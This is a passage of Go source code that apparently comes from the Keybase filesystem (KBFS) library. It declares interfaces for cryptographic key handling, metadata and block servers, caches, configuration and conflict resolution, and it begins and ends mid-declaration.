key/rekey // the TLF. MakeRandomTLFEphemeralKeys() (kbfscrypto.TLFEphemeralPublicKey, kbfscrypto.TLFEphemeralPrivateKey, error) // MakeRandomTLFKeys generates keys using a CSPRNG for a // single key generation of a TLF. MakeRandomTLFKeys() (kbfscrypto.TLFPublicKey, kbfscrypto.TLFPrivateKey, kbfscrypto.TLFCryptKey, error) // MakeRandomTLFCryptKeyServerHalf generates the server-side of a // top-level folder crypt key. MakeRandomTLFCryptKeyServerHalf() ( kbfscrypto.TLFCryptKeyServerHalf, error) // MakeRandomBlockCryptKeyServerHalf generates the server-side of // a block crypt key. 
MakeRandomBlockCryptKeyServerHalf() ( kbfscrypto.BlockCryptKeyServerHalf, error) // EncryptTLFCryptKeyClientHalf encrypts a TLFCryptKeyClientHalf // using both a TLF's ephemeral private key and a device pubkey. EncryptTLFCryptKeyClientHalf( privateKey kbfscrypto.TLFEphemeralPrivateKey, publicKey kbfscrypto.CryptPublicKey, clientHalf kbfscrypto.TLFCryptKeyClientHalf) ( EncryptedTLFCryptKeyClientHalf, error) // EncryptPrivateMetadata encrypts a PrivateMetadata object. EncryptPrivateMetadata( pmd PrivateMetadata, key kbfscrypto.TLFCryptKey) ( EncryptedPrivateMetadata, error) // DecryptPrivateMetadata decrypts a PrivateMetadata object. DecryptPrivateMetadata( encryptedPMD EncryptedPrivateMetadata, key kbfscrypto.TLFCryptKey) (PrivateMetadata, error) // EncryptBlocks encrypts a block. plainSize is the size of the encoded // block; EncryptBlock() must guarantee that plainSize <= // len(encryptedBlock). EncryptBlock(block Block, key kbfscrypto.BlockCryptKey) ( plainSize int, encryptedBlock EncryptedBlock, err error) // DecryptBlock decrypts a block. Similar to EncryptBlock(), // DecryptBlock() must guarantee that (size of the decrypted // block) <= len(encryptedBlock). DecryptBlock(encryptedBlock EncryptedBlock, key kbfscrypto.BlockCryptKey, block Block) error // GetTLFCryptKeyServerHalfID creates a unique ID for this particular // kbfscrypto.TLFCryptKeyServerHalf. GetTLFCryptKeyServerHalfID( user keybase1.UID, devicePubKey kbfscrypto.CryptPublicKey, serverHalf kbfscrypto.TLFCryptKeyServerHalf) ( TLFCryptKeyServerHalfID, error) // VerifyTLFCryptKeyServerHalfID verifies the ID is the proper HMAC result. VerifyTLFCryptKeyServerHalfID(serverHalfID TLFCryptKeyServerHalfID, user keybase1.UID, devicePubKey kbfscrypto.CryptPublicKey, serverHalf kbfscrypto.TLFCryptKeyServerHalf) error // EncryptMerkleLeaf encrypts a Merkle leaf node with the TLFPublicKey. EncryptMerkleLeaf(leaf MerkleLeaf, pubKey kbfscrypto.TLFPublicKey, nonce *[24]byte, ePrivKey kbfscrypto.TLFEphemeralPrivateKey) ( EncryptedMerkleLeaf, error) // DecryptMerkleLeaf decrypts a Merkle leaf node with the TLFPrivateKey. DecryptMerkleLeaf(encryptedLeaf EncryptedMerkleLeaf, privKey kbfscrypto.TLFPrivateKey, nonce *[24]byte, ePubKey kbfscrypto.TLFEphemeralPublicKey) (*MerkleLeaf, error) // MakeTLFWriterKeyBundleID hashes a TLFWriterKeyBundleV3 to create an ID. MakeTLFWriterKeyBundleID(wkb TLFWriterKeyBundleV3) (TLFWriterKeyBundleID, error) // MakeTLFReaderKeyBundleID hashes a TLFReaderKeyBundleV3 to create an ID. MakeTLFReaderKeyBundleID(rkb TLFReaderKeyBundleV3) (TLFReaderKeyBundleID, error) // EncryptTLFCryptKeys encrypts an array of historic TLFCryptKeys. EncryptTLFCryptKeys(oldKeys []kbfscrypto.TLFCryptKey, key kbfscrypto.TLFCryptKey) (EncryptedTLFCryptKeys, error) // DecryptTLFCryptKeys decrypts an array of historic TLFCryptKeys. DecryptTLFCryptKeys( encKeys EncryptedTLFCryptKeys, key kbfscrypto.TLFCryptKey) ( []kbfscrypto.TLFCryptKey, error) } // Crypto signs, verifies, encrypts, and decrypts stuff. type Crypto interface { cryptoPure // Duplicate kbfscrypto.Signer here to work around gomock's // limitations. Sign(context.Context, []byte) (kbfscrypto.SignatureInfo, error) SignForKBFS(context.Context, []byte) (kbfscrypto.SignatureInfo, error) SignToString(context.Context, []byte) (string, error) // DecryptTLFCryptKeyClientHalf decrypts a // kbfscrypto.TLFCryptKeyClientHalf using the current device's // private key and the TLF's ephemeral public key. 
DecryptTLFCryptKeyClientHalf(ctx context.Context, publicKey kbfscrypto.TLFEphemeralPublicKey, encryptedClientHalf EncryptedTLFCryptKeyClientHalf) ( kbfscrypto.TLFCryptKeyClientHalf, error) // DecryptTLFCryptKeyClientHalfAny decrypts one of the // kbfscrypto.TLFCryptKeyClientHalf using the available // private keys and the ephemeral public key. If promptPaper // is true, the service will prompt the user for any unlocked // paper keys. DecryptTLFCryptKeyClientHalfAny(ctx context.Context, keys []EncryptedTLFCryptKeyClientAndEphemeral, promptPaper bool) ( kbfscrypto.TLFCryptKeyClientHalf, int, error) // Shutdown frees any resources associated with this instance. Shutdown() } // MDOps gets and puts root metadata to an MDServer. On a get, it // verifies the metadata is signed by the metadata's signing key. type MDOps interface { // GetForHandle returns the current metadata object // corresponding to the given top-level folder's handle and // merge status, if the logged-in user has read permission on // the folder. It creates the folder if one doesn't exist // yet, and the logged-in user has permission to do so. // // If there is no returned error, then the returned ID must // always be non-null. An empty ImmutableRootMetadata may be // returned, but if it is non-empty, then its ID must match // the returned ID. GetForHandle( ctx context.Context, handle *TlfHandle, mStatus MergeStatus) ( tlf.ID, ImmutableRootMetadata, error) // GetForTLF returns the current metadata object // corresponding to the given top-level folder, if the logged-in // user has read permission on the folder. GetForTLF(ctx context.Context, id tlf.ID) (ImmutableRootMetadata, error) // GetUnmergedForTLF is the same as the above but for unmerged // metadata. GetUnmergedForTLF(ctx context.Context, id tlf.ID, bid BranchID) ( ImmutableRootMetadata, error) // GetRange returns a range of metadata objects corresponding to // the passed revision numbers (inclusive). GetRange(ctx context.Context, id tlf.ID, start, stop kbfsmd.Revision) ( []ImmutableRootMetadata, error) // GetUnmergedRange is the same as the above but for unmerged // metadata history (inclusive). GetUnmergedRange(ctx context.Context, id tlf.ID, bid BranchID, start, stop kbfsmd.Revision) ([]ImmutableRootMetadata, error) // Put stores the metadata object for the given top-level folder. // This also adds the resulting ImmutableRootMetadata object to // the mdcache, if the Put is successful. Note that constructing // the ImmutableRootMetadata requires knowing the verifying key, // which might not be the same as the local user's verifying key // if the MD has been copied from a previous update. Put(ctx context.Context, rmd *RootMetadata, verifyingKey kbfscrypto.VerifyingKey) (ImmutableRootMetadata, error) // PutUnmerged is the same as the above but for unmerged metadata // history. This also adds the resulting ImmutableRootMetadata // object to the mdcache, if the PutUnmerged is successful. Note // that constructing the ImmutableRootMetadata requires knowing // the verifying key, which might not be the same as the local // user's verifying key if the MD has been copied from a previous // update. PutUnmerged(ctx context.Context, rmd *RootMetadata, verifyingKey kbfscrypto.VerifyingKey) (ImmutableRootMetadata, error) // PruneBranch prunes all unmerged history for the given TLF // branch. 
PruneBranch(ctx context.Context, id tlf.ID, bid BranchID) error // ResolveBranch prunes all unmerged history for the given TLF // branch, and also deletes any blocks in `blocksToDelete` that // are still in the local journal. In addition, it appends the // given MD to the journal. This also adds the resulting // ImmutableRootMetadata object to the mdcache, if the // ResolveBranch is successful. Note that constructing the // ImmutableRootMetadata requires knowing the verifying key, which // might not be the same as the local user's verifying key if the // MD has been copied from a previous update. ResolveBranch(ctx context.Context, id tlf.ID, bid BranchID, blocksToDelete []kbfsblock.ID, rmd *RootMetadata, verifyingKey kbfscrypto.VerifyingKey) (ImmutableRootMetadata, error) // GetLatestHandleForTLF returns the server's idea of the latest handle for the TLF, // which may not yet be reflected in the MD if the TLF hasn't been rekeyed since it // entered into a conflicting state. GetLatestHandleForTLF(ctx context.Context, id tlf.ID) ( tlf.Handle, error) } // KeyOps fetches server-side key halves from the key server. type KeyOps interface { // GetTLFCryptKeyServerHalf gets a server-side key half for a // device given the key half ID. GetTLFCryptKeyServerHalf(ctx context.Context, serverHalfID TLFCryptKeyServerHalfID, cryptPublicKey kbfscrypto.CryptPublicKey) ( kbfscrypto.TLFCryptKeyServerHalf, error) // PutTLFCryptKeyServerHalves stores a server-side key halves for a // set of users and devices. PutTLFCryptKeyServerHalves(ctx context.Context, keyServerHalves UserDeviceKeyServerHalves) error // DeleteTLFCryptKeyServerHalf deletes a server-side key half for a // device given the key half ID. DeleteTLFCryptKeyServerHalf(ctx context.Context, uid keybase1.UID, key kbfscrypto.CryptPublicKey, serverHalfID TLFCryptKeyServerHalfID) error } // Prefetcher is an interface to a block prefetcher. type Prefetcher interface { // PrefetchBlock directs the prefetcher to prefetch a block. PrefetchBlock(block Block, blockPtr BlockPointer, kmd KeyMetadata, priority int) error // PrefetchAfterBlockRetrieved allows the prefetcher to trigger prefetches // after a block has been retrieved. Whichever component is responsible for // retrieving blocks will call this method once it's done retrieving a // block. PrefetchAfterBlockRetrieved(b Block, blockPtr BlockPointer, kmd KeyMetadata) // Shutdown shuts down the prefetcher idempotently. Future calls to // the various Prefetch* methods will return io.EOF. The returned channel // allows upstream components to block until all pending prefetches are // complete. This feature is mainly used for testing, but also to toggle // the prefetcher on and off. Shutdown() <-chan struct{} } // BlockOps gets and puts data blocks to a BlockServer. It performs // the necessary crypto operations on each block. type BlockOps interface { // Get gets the block associated with the given block pointer // (which belongs to the TLF with the given key metadata), // decrypts it if necessary, and fills in the provided block // object with its contents, if the logged-in user has read // permission for that block. cacheLifetime controls the behavior of the // write-through cache once a Get completes. Get(ctx context.Context, kmd KeyMetadata, blockPtr BlockPointer, block Block, cacheLifetime BlockCacheLifetime) error // GetEncodedSize gets the encoded size of the block associated // with the given block pointer (which belongs to the TLF with the // given key metadata). 
GetEncodedSize(ctx context.Context, kmd KeyMetadata, blockPtr BlockPointer) (uint32, error) // Ready turns the given block (which belongs to the TLF with // the given key metadata) into encoded (and encrypted) data, // and calculates its ID and size, so that we can do a bunch // of block puts in parallel for every write. Ready() must // guarantee that plainSize <= readyBlockData.QuotaSize(). Ready(ctx context.Context, kmd KeyMetadata, block Block) ( id kbfsblock.ID, plainSize int, readyBlockData ReadyBlockData, err error) // Delete instructs the server to delete the given block references. // It returns the number of not-yet deleted references to // each block reference Delete(ctx context.Context, tlfID tlf.ID, ptrs []BlockPointer) ( liveCounts map[kbfsblock.ID]int, err error) // Archive instructs the server to mark the given block references // as "archived"; that is, they are not being used in the current // view of the folder, and shouldn't be served to anyone other // than folder writers. Archive(ctx context.Context, tlfID tlf.ID, ptrs []BlockPointer) error // TogglePrefetcher activates or deactivates the prefetcher. TogglePrefetcher(ctx context.Context, enable bool) error // BlockRetriever obtains the block retriever BlockRetriever() BlockRetriever // Prefetcher retrieves this BlockOps' Prefetcher. Prefetcher() Prefetcher // Shutdown shuts down all the workers performing Get operations Shutdown() } // Duplicate kbfscrypto.AuthTokenRefreshHandler here to work around // gomock's limitations. type authTokenRefreshHandler interface { RefreshAuthToken(context.Context) } // MDServer gets and puts metadata for each top-level directory. The // instantiation should be able to fetch session/user details via KBPKI. On a // put, the server is responsible for 1) ensuring the user has appropriate // permissions for whatever modifications were made; 2) ensuring that // LastModifyingWriter and LastModifyingUser are updated appropriately; and 3) // detecting conflicting writes based on the previous root block ID (i.e., when // it supports strict consistency). On a get, it verifies the logged-in user // has read permissions. // // TODO: Add interface for searching by time type MDServer interface { authTokenRefreshHandler // GetForHandle returns the current (signed/encrypted) metadata // object corresponding to the given top-level folder's handle, if // the logged-in user has read permission on the folder. It // creates the folder if one doesn't exist yet, and the logged-in // user has permission to do so. // // If there is no returned error, then the returned ID must // always be non-null. A nil *RootMetadataSigned may be // returned, but if it is non-nil, then its ID must match the // returned ID. GetForHandle(ctx context.Context, handle tlf.Handle, mStatus MergeStatus) (tlf.ID, *RootMetadataSigned, error) // GetForTLF returns the current (signed/encrypted) metadata object // corresponding to the given top-level folder, if the logged-in // user has read permission on the folder. GetForTLF(ctx context.Context, id tlf.ID, bid BranchID, mStatus MergeStatus) ( *RootMetadataSigned, error) // GetRange returns a range of (signed/encrypted) metadata objects // corresponding to the passed revision numbers (inclusive). GetRange(ctx context.Context, id tlf.ID, bid BranchID, mStatus MergeStatus, start, stop kbfsmd.Revision) ([]*RootMetadataSigned, error) // Put stores the (signed/encrypted) metadata object for the given // top-level folder. 
Note: If the unmerged bit is set in the metadata // block's flags bitmask it will be appended to the unmerged per-device // history. Put(ctx context.Context, rmds *RootMetadataSigned, extra ExtraMetadata) error // PruneBranch prunes all unmerged history for the given TLF branch. PruneBranch(ctx context.Context, id tlf.ID, bid BranchID) error // RegisterForUpdate tells the MD server to inform the caller when // there is a merged update with a revision number greater than // currHead, which did NOT originate from this same MD server // session. This method returns a chan which can receive only a // single error before it's closed. If the received err is nil, // then there is updated MD ready to fetch which didn't originate // locally; if it is non-nil, then the previous registration // cannot send the next notification (e.g., the connection to the // MD server may have failed). In either case, the caller must // re-register to get a new chan that can receive future update // notifications. RegisterForUpdate(ctx context.Context, id tlf.ID, currHead kbfsmd.Revision) (<-chan error, error) // CancelRegistration lets the local MDServer instance know that // we are no longer interested in updates for the specified // folder. It does not necessarily forward this cancellation to // remote servers. CancelRegistration(ctx context.Context, id tlf.ID) // CheckForRekeys initiates the rekey checking process on the // server. The server is allowed to delay this request, and so it // returns a channel for returning the error. Actual rekey // requests are expected to come in asynchronously. CheckForRekeys(ctx context.Context) <-chan error // TruncateLock attempts to take the history truncation lock for // this folder, for a TTL defined by the server. Returns true if // the lock was successfully taken. TruncateLock(ctx context.Context, id tlf.ID) (bool, error) // TruncateUnlock attempts to release the history truncation lock // for this folder. Returns true if the lock was successfully // released. TruncateUnlock(ctx context.Context, id tlf.ID) (bool, error) // DisableRekeyUpdatesForTesting disables processing rekey updates // received from the mdserver while testing. DisableRekeyUpdatesForTesting() // Shutdown is called to shutdown an MDServer connection. Shutdown() // IsConnected returns whether the MDServer is connected. IsConnected() bool // GetLatestHandleForTLF returns the server's idea of the latest handle for the TLF, // which may not yet be reflected in the MD if the TLF hasn't been rekeyed since it // entered into a conflicting state. For the highest level of confidence, the caller // should verify the mapping with a Merkle tree lookup. GetLatestHandleForTLF(ctx context.Context, id tlf.ID) ( tlf.Handle, error) // OffsetFromServerTime is the current estimate for how off our // local clock is from the mdserver clock. Add this to any // mdserver-provided timestamps to get the "local" time of the // corresponding event. If the returned bool is false, then we // don't have a current estimate for the offset. OffsetFromServerTime() (time.Duration, bool) // GetKeyBundles looks up the key bundles for the given key // bundle IDs. tlfID must be non-zero but either or both wkbID // and rkbID can be zero, in which case nil will be returned // for the respective bundle. If a bundle cannot be found, an // error is returned and nils are returned for both bundles. 
GetKeyBundles(ctx context.Context, tlfID tlf.ID, wkbID TLFWriterKeyBundleID, rkbID TLFReaderKeyBundleID) ( *TLFWriterKeyBundleV3, *TLFReaderKeyBundleV3, error) // CheckReachability is called when the Keybase service sends a notification // that network connectivity has changed. CheckReachability(ctx context.Context) // FastForwardBackoff fast forwards any existing backoff timer for // reconnects. If MD server is connected at the time this is called, it's // essentially a no-op. FastForwardBackoff() } type mdServerLocal interface { MDServer addNewAssertionForTest( uid keybase1.UID, newAssertion keybase1.SocialAssertion) error getCurrentMergedHeadRevision(ctx context.Context, id tlf.ID) ( rev kbfsmd.Revision, err error) isShutdown() bool copy(config mdServerLocalConfig) mdServerLocal } // BlockServer gets and puts opaque data blocks. The instantiation // should be able to fetch session/user details via KBPKI. On a // put/delete, the server is reponsible for: 1) checking that the ID // matches the hash of the buffer; and 2) enforcing writer quotas. type BlockServer interface { authTokenRefreshHandler // Get gets the (encrypted) block data associated with the given // block ID and context, uses the provided block key to decrypt // the block, and fills in the provided block object with its // contents, if the logged-in user has read permission for that // block. Get(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) ( []byte, kbfscrypto.BlockCryptKeyServerHalf, error) // Put stores the (encrypted) block data under the given ID // and context on the server, along with the server half of // the block key. context should contain a kbfsblock.RefNonce // of zero. There will be an initial reference for this block // for the given context. // // Put should be idempotent, although it should also return an // error if, for a given ID, any of the other arguments differ // from previous Put calls with the same ID. // // If this returns a BServerErrorOverQuota, with Throttled=false, // the caller can treat it as informational and otherwise ignore // the error. Put(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) error // PutAgain re-stores a previously deleted block under the same ID // with the same data. PutAgain(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) error // AddBlockReference adds a new reference to the given block, // defined by the given context (which should contain a // non-zero kbfsblock.RefNonce). (Contexts with a // kbfsblock.RefNonce of zero should be used when putting the // block for the first time via Put().) Returns a // BServerErrorBlockNonExistent if id is unknown within this // folder. // // AddBlockReference should be idempotent, although it should // also return an error if, for a given ID and refnonce, any // of the other fields of context differ from previous // AddBlockReference calls with the same ID and refnonce. // // If this returns a BServerErrorOverQuota, with Throttled=false, // the caller can treat it as informational and otherwise ignore // the error. AddBlockReference(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) error // RemoveBlockReferences removes the references to the given block // ID defined by the given contexts. 
If no references to the block // remain after this call, the server is allowed to delete the // corresponding block permanently. If the reference defined by // the count has already been removed, the call is a no-op. // It returns the number of remaining not-yet-deleted references after this // reference has been removed RemoveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) (liveCounts map[kbfsblock.ID]int, err error) // ArchiveBlockReferences marks the given block references as // "archived"; that is, they are not being used in the current // view of the folder, and shouldn't be served to anyone other // than folder writers. // // For a given ID/refnonce pair, ArchiveBlockReferences should // be idempotent, although it should also return an error if // any of the other fields of the context differ from previous // calls with the same ID/refnonce pair. ArchiveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) error // IsUnflushed returns whether a given block is being queued // locally for later flushing to another block server. If the // block is currently being flushed to the server, this should // return `true`, so that the caller will try to clean it up from // the server if it's no longer needed. IsUnflushed(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID) ( bool, error) // Shutdown is called to shutdown a BlockServer connection. Shutdown(ctx context.Context) // GetUserQuotaInfo returns the quota for the logged-in user. GetUserQuotaInfo(ctx context.Context) (info *kbfsblock.QuotaInfo, err error) // GetTeamQuotaInfo returns the quota for a team. GetTeamQuotaInfo(ctx context.Context, tid keybase1.TeamID) ( info *kbfsblock.QuotaInfo, err error) } // blockServerLocal is the interface for BlockServer implementations // that store data locally. type blockServerLocal interface { BlockServer // getAllRefsForTest returns all the known block references // for the given TLF, and should only be used during testing. getAllRefsForTest(ctx context.Context, tlfID tlf.ID) ( map[kbfsblock.ID]blockRefMap, error) } // BlockSplitter decides when a file or directory block needs to be split type BlockSplitter interface { // CopyUntilSplit copies data into the block until we reach the // point where we should split, but only if writing to the end of // the last block. If this is writing into the middle of a file, // just copy everything that will fit into the block, and assume // that block boundaries will be fixed later. Return how much was // copied. CopyUntilSplit( block *FileBlock, lastBlock bool, data []byte, off int64) int64 // CheckSplit, given a block, figures out whether it ends at the // right place. If so, return 0. If not, return either the // offset in the block where it should be split, or -1 if more // bytes from the next block should be appended. CheckSplit(block *FileBlock) int64 // MaxPtrsPerBlock describes the number of indirect pointers we // can fit into one indirect block. MaxPtrsPerBlock() int // ShouldEmbedBlockChanges decides whether we should keep the // block changes embedded in the MD or not. ShouldEmbedBlockChanges(bc *BlockChanges) bool } // KeyServer fetches/writes server-side key halves from/to the key server. type KeyServer interface { // GetTLFCryptKeyServerHalf gets a server-side key half for a // device given the key half ID. 
GetTLFCryptKeyServerHalf(ctx context.Context, serverHalfID TLFCryptKeyServerHalfID, cryptPublicKey kbfscrypto.CryptPublicKey) ( kbfscrypto.TLFCryptKeyServerHalf, error) // PutTLFCryptKeyServerHalves stores a server-side key halves for a // set of users and devices. PutTLFCryptKeyServerHalves(ctx context.Context, keyServerHalves UserDeviceKeyServerHalves) error // DeleteTLFCryptKeyServerHalf deletes a server-side key half for a // device given the key half ID. DeleteTLFCryptKeyServerHalf(ctx context.Context, uid keybase1.UID, key kbfscrypto.CryptPublicKey, serverHalfID TLFCryptKeyServerHalfID) error // Shutdown is called to free any KeyServer resources. Shutdown() } // NodeChange represents a change made to a node as part of an atomic // file system operation. type NodeChange struct { Node Node // Basenames of entries added/removed. DirUpdated []string FileUpdated []WriteRange } // Observer can be notified that there is an available update for a // given directory. The notification callbacks should not block, or // make any calls to the Notifier interface. Nodes passed to the // observer should not be held past the end of the notification // callback. type Observer interface { // LocalChange announces that the file at this Node has been // updated locally, but not yet saved at the server. LocalChange(ctx context.Context, node Node, write WriteRange) // BatchChanges announces that the nodes have all been updated // together atomically. Each NodeChange in changes affects the // same top-level folder and branch. BatchChanges(ctx context.Context, changes []NodeChange) // TlfHandleChange announces that the handle of the corresponding // folder branch has changed, likely due to previously-unresolved // assertions becoming resolved. This indicates that the listener // should switch over any cached paths for this folder-branch to // the new name. Nodes that were acquired under the old name will // still continue to work, but new lookups on the old name may // either encounter alias errors or entirely new TLFs (in the case // of conflicts). TlfHandleChange(ctx context.Context, newHandle *TlfHandle) } // Notifier notifies registrants of directory changes type Notifier interface { // RegisterForChanges declares that the given Observer wants to // subscribe to updates for the given top-level folders. RegisterForChanges(folderBranches []FolderBranch, obs Observer) error // UnregisterFromChanges declares that the given Observer no // longer wants to subscribe to updates for the given top-level // folders. UnregisterFromChanges(folderBranches []FolderBranch, obs Observer) error } // Clock is an interface for getting the current time type Clock interface { // Now returns the current time. Now() time.Time } // ConflictRenamer deals with names for conflicting directory entries. type ConflictRenamer interface { // ConflictRename returns the appropriately modified filename. ConflictRename(ctx context.Context, op op, original string) ( string, error) } // Tracer maybe adds traces to contexts. type Tracer interface { // MaybeStartTrace, if tracing is on, returns a new context // based on the given one with an attached trace made with the // given family and title. Otherwise, it returns the given // context unchanged. MaybeStartTrace(ctx context.Context, family, title string) context.Context // MaybeFinishTrace, finishes the trace attached to the given // context, if any. 
MaybeFinishTrace(ctx context.Context, err error) } // Config collects all the singleton instance instantiations needed to // run KBFS in one place. The methods below are self-explanatory and // do not require comments. type Config interface { dataVersioner logMaker blockCacher blockServerGetter codecGetter cryptoPureGetter keyGetterGetter cryptoGetter signerGetter currentSessionGetterGetter diskBlockCacheGetter diskBlockCacheSetter clockGetter diskLimiterGetter Tracer KBFSOps() KBFSOps SetKBFSOps(KBFSOps) KBPKI() KBPKI SetKBPKI(KBPKI) KeyManager() KeyManager SetKeyManager(KeyManager) Reporter() Reporter SetReporter(Reporter) MDCache() MDCache SetMDCache(MDCache) KeyCache() KeyCache SetKeyBundleCache(KeyBundleCache) KeyBundleCache() KeyBundleCache SetKeyCache(KeyCache) SetBlockCache(BlockCache) DirtyBlockCache() DirtyBlockCache SetDirtyBlockCache(DirtyBlockCache) SetCrypto(Crypto) SetCodec(kbfscodec.Codec) MDOps() MDOps SetMDOps(MDOps) KeyOps() KeyOps SetKeyOps(KeyOps) BlockOps() BlockOps SetBlockOps(BlockOps) MDServer() MDServer SetMDServer(MDServer) SetBlockServer(BlockServer) KeyServer() KeyServer SetKeyServer(KeyServer) KeybaseService() KeybaseService SetKeybaseService(KeybaseService) BlockSplitter() BlockSplitter SetBlockSplitter(BlockSplitter) Notifier() Notifier SetNotifier(Notifier) SetClock(Clock) ConflictRenamer() ConflictRenamer SetConflictRenamer(ConflictRenamer) MetadataVersion() MetadataVer SetMetadataVersion(MetadataVer) RekeyQueue() RekeyQueue SetRekeyQueue(RekeyQueue) // ReqsBufSize indicates the number of read or write operations // that can be buffered per folder ReqsBufSize() int // MaxNameBytes indicates the maximum supported size of a // directory entry name in bytes. MaxNameBytes() uint32 // MaxDirBytes indicates the maximum supported plaintext size of a // directory in bytes. MaxDirBytes() uint64 // DoBackgroundFlushes says whether we should periodically try to // flush dirty files, even without a sync from the user. Should // be true except for during some testing. DoBackgroundFlushes() bool SetDoBackgroundFlushes(bool) // RekeyWithPromptWaitTime indicates how long to wait, after // setting the rekey bit, before prompting for a paper key. RekeyWithPromptWaitTime() time.Duration SetRekeyWithPromptWaitTime(time.Duration) // Mode indicates how KBFS is configured to run. Mode() InitMode // GracePeriod specifies a grace period for which a delayed cancellation // waits before actual cancels the context. This is useful for giving // critical portion of a slow remote operation some extra time to finish as // an effort to avoid conflicting. Example include an O_EXCL Create call // interrupted by ALRM signal actually makes it to the server, while // application assumes not since EINTR is returned. A delayed cancellation // allows us to distinguish between successful cancel (where remote operation // didn't make to server) or failed cancel (where remote operation made to // the server). However, the optimal value of this depends on the network // conditions. A long grace period for really good network condition would // just unnecessarily slow down Ctrl-C. // // TODO: make this adaptive and self-change over time based on network // conditions. DelayedCancellationGracePeriod() time.Duration SetDelayedCancellationGracePeriod(time.Duration) // QuotaReclamationPeriod indicates how often should each TLF // should check for quota to reclaim. If the Duration.Seconds() // == 0, quota reclamation should not run automatically. 
QuotaReclamationPeriod() time.Duration // QuotaReclamationMinUnrefAge indicates the minimum time a block // must have been unreferenced before it can be reclaimed. QuotaReclamationMinUnrefAge() time.Duration // QuotaReclamationMinHeadAge indicates the minimum age of the // most recently merged MD update before we can run reclamation, // to avoid conflicting with a currently active writer. QuotaReclamationMinHeadAge() time.Duration // ResetCaches clears and re-initializes all data and key caches. ResetCaches() // StorageRoot returns the path to the storage root for this config. StorageRoot() string // MetricsRegistry may be nil, which should be interpreted as // not using metrics at all. (i.e., as if UseNilMetrics were // set). This differs from how go-metrics treats nil Registry // objects, which is to use the default registry. MetricsRegistry() metrics.Registry SetMetricsRegistry(metrics.Registry) // SetTraceOptions set the options for tracing (via x/net/trace). SetTraceOptions(enabled bool) // TLFValidDuration is the time TLFs are valid before identification needs to be redone. TLFValidDuration() time.Duration // SetTLFValidDuration sets TLFValidDuration. SetTLFValidDuration(time.Duration) // BGFlushDirOpBatchSize returns the directory op batch size for // background flushes. BGFlushDirOpBatchSize() int // SetBGFlushDirOpBatchSize sets the directory op batch size for // background flushes. SetBGFlushDirOpBatchSize(s int) // BGFlushPeriod returns how long to wait for a batch to fill up // before syncing a set of changes to the servers. BGFlushPeriod() time.Duration // SetBGFlushPeriod sets how long to wait for a batch to fill up // before syncing a set of changes to the servers. SetBGFlushPeriod(p time.Duration) // Shutdown is called to free config resources. Shutdown(context.Context) error // CheckStateOnShutdown tells the caller whether or not it is safe // to check the state of the system on shutdown. CheckStateOnShutdown() bool } // NodeCache holds Nodes, and allows libkbfs to update them when // things change about the underlying KBFS blocks. It is probably // most useful to instantiate this on a per-folder-branch basis, so // that it can create a Path with the correct DirId and Branch name. type NodeCache interface { // GetOrCreate either makes a new Node for the given // BlockPointer, or returns an existing one. TODO: If we ever // support hard links, we will have to revisit the "name" and // "parent" parameters here. name must not be empty. Returns // an error if parent cannot be found. GetOrCreate(ptr BlockPointer, name string, parent Node) (Node, error) // Get returns the Node associated with the given ptr if one // already exists. Otherwise, it returns nil. Get(ref BlockRef) Node // UpdatePointer updates the BlockPointer for the corresponding // Node. NodeCache ignores this call when oldRef is not cached in // any Node. Returns whether the pointer was updated. UpdatePointer(oldRef BlockRef, newPtr BlockPointer) bool // Move swaps the parent node for the corresponding Node, and // updates the node's name. NodeCache ignores the call when ptr // is not cached. If newParent is nil, it treats the ptr's // corresponding node as being unlinked from the old parent // completely. If successful, it returns a function that can be // called to undo the effect of the move (or `nil` if nothing // needs to be done); if newParent cannot be found, it returns an // error and a `nil` undo function. 
Move(ref BlockRef, newParent Node, newName string) ( undoFn func(), err error) // Unlink set the corresponding node's parent to nil and caches // the provided path in case the node is still open. NodeCache // ignores the call when ptr is not cached. The path is required // because the caller may have made changes to the parent nodes // already that shouldn't be reflected in the cached path. It // returns a function that can be called to undo the effect of the // unlink (or `nil` if nothing needs to be done). Unlink(ref BlockRef, oldPath path, oldDe DirEntry) (undoFn func()) // IsUnlinked returns whether `Unlink` has been called for the // reference behind this node. IsUnlinked(node Node) bool // UnlinkedDirEntry returns a pointer to a modifiable directory // entry if `Unlink` has been called for the reference behind this // node. UnlinkedDirEntry(node Node) DirEntry // PathFromNode creates the path up to a given Node. PathFromNode(node Node) path // AllNodes returns the complete set of nodes currently in the cache. AllNodes() []Node } // fileBlockDeepCopier fetches a file block, makes a deep copy of it // (duplicating pointer for any indirect blocks) and generates a new // random temporary block ID for it. It returns the new BlockPointer, // and internally saves the block for future uses. type fileBlockDeepCopier func(context.Context, string, BlockPointer) ( BlockPointer, error) // crAction represents a specific action to take as part of the // conflict resolution process. type crAction interface { // swapUnmergedBlock should be called before do(), and if it // returns true, the caller must use the merged block // corresponding to the returned BlockPointer instead of // unmergedBlock when calling do(). If BlockPointer{} is zeroPtr // (and true is returned), just swap in the regular mergedBlock. swapUnmergedBlock(unmergedChains *crChains, mergedChains *crChains, unmergedBlock *DirBlock) (bool, BlockPointer, error) // do modifies the given merged block in place to resolve the // conflict, and potential uses the provided blockCopyFetchers to // obtain copies of other blocks (along with new BlockPointers) // when requiring a block copy. do(ctx context.Context, unmergedCopier fileBlockDeepCopier, mergedCopier fileBlockDeepCopier, unmergedBlock *DirBlock, mergedBlock *DirBlock) error // updateOps potentially modifies, in place, the slices of // unmerged and merged operations stored in the corresponding // crChains for the given unmerged and merged most recent // pointers. Eventually, the "unmerged" ops will be pushed as // part of a MD update, and so should contain any necessarily // operations to fully merge the unmerged data, including any // conflict resolution. The "merged" ops will be played through // locally, to notify any caches about the newly-obtained merged // data (and any changes to local data that were required as part // of conflict resolution, such as renames). A few things to note: // * A particular action's updateOps method may be called more than // once for different sets of chains, however it should only add // new directory operations (like create/rm/rename) into directory // chains. // * updateOps doesn't necessarily result in correct BlockPointers within // each of those ops; that must happen in a later phase. // * mergedBlock can be nil if the chain is for a file. 
